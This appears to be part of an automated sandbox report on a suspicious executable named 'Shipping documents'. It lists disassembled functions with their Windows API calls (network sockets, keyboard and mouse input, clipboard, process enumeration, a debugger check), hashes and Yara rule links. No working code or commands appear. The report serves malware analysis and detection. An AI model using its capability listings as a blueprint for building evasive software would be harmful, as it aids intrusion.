                                                                                                          • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                                          • String ID:
                                                                                                          • API String ID: 1158019794-0
                                                                                                          • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                          • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                                          • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                          • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                                          Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1737998785-0
                                                                                                          • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                          • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                                          • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                          • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                                                          Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                                          • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                                          • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                          • API String ID: 4194297153-14809454
                                                                                                          • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                          • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                                          • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                          • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                                          Function 0044EB5F Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 643COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$_strncmp
                                                                                                          • String ID: @oH$\$^$h
                                                                                                          • API String ID: 2175499884-3701065813
                                                                                                          • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                          • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                                          • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                          • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                                          Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                                          • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 540024437-0
                                                                                                          • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                          • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                                          • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                          • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                                          Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                          • API String ID: 0-2872873767
                                                                                                          • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                          • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                          • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                          • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                                          Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                          • __wsplitpath.LIBCMT ref: 00475644
                                                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                          • _wcscat.LIBCMT ref: 00475657
                                                                                                          • __wcsicoll.LIBCMT ref: 0047567B
                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                          • String ID:
                                                                                                          • API String ID: 2547909840-0
                                                                                                          • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                          • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                          • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                          • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                                          Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                                          • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                                          • FindClose.KERNEL32(?), ref: 004525FF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                                          • String ID: *.*$\VH
                                                                                                          • API String ID: 2786137511-2657498754
                                                                                                          • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                          • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                                          • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                          • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                                          Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                                          • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                          • String ID: pqI
                                                                                                          • API String ID: 2579439406-2459173057
                                                                                                          • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                          • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                                          • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                          • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                                          Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __wcsicoll.LIBCMT ref: 00433349
                                                                                                          • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                                          • __wcsicoll.LIBCMT ref: 00433375
                                                                                                          • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsicollmouse_event
                                                                                                          • String ID: DOWN
                                                                                                          • API String ID: 1033544147-711622031
                                                                                                          • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                          • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                                          • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                          • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                                          Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                                          • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                                          • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                                          • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                                          • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: KeyboardMessagePostState$InputSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3031425849-0
                                                                                                          • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                          • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                                          • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                          • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                                          Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastinet_addrsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 4170576061-0
                                                                                                          • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                          • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                                          • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                          • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                                          Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                          • IsWindowVisible.USER32 ref: 0047A368
                                                                                                          • IsWindowEnabled.USER32 ref: 0047A378
                                                                                                          • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                                          • IsIconic.USER32 ref: 0047A393
                                                                                                          • IsZoomed.USER32 ref: 0047A3A1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                          • String ID:
                                                                                                          • API String ID: 292994002-0
                                                                                                          • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                          • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                                          • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                          • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                                          Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                          • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                                          • CoUninitialize.OLE32 ref: 0047863C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                          • String ID: .lnk
                                                                                                          • API String ID: 886957087-24824748
                                                                                                          • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                          • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                                          • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                          • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
